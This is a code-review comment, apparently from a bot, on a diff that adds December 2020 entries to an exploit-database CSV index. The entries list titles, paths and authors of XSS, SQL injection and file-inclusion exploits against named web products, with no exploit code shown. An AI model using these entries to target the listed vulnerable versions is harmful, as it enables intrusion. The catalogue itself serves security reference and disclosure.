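Review bot: The new `49183` row in the `@@ -43369,7 +43369,8 @@` hunk is inserted between `49139` and `49140`, inside the 2020-12-01 block, while every other 2020-12-03 entry from this commit is appended at the tail in the following hunk; moving the row there keeps the index in id order, which is what the existing rows and tooling that binary-search or diff this file appear to rely on. The `49139` description cleanup in the same hunk (dropping the stray `# Date: 11-14-2020` fragment) is fine as is.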
@@ -43399,3 +43400,9 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
+49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
+49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
+49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
+49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
+49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,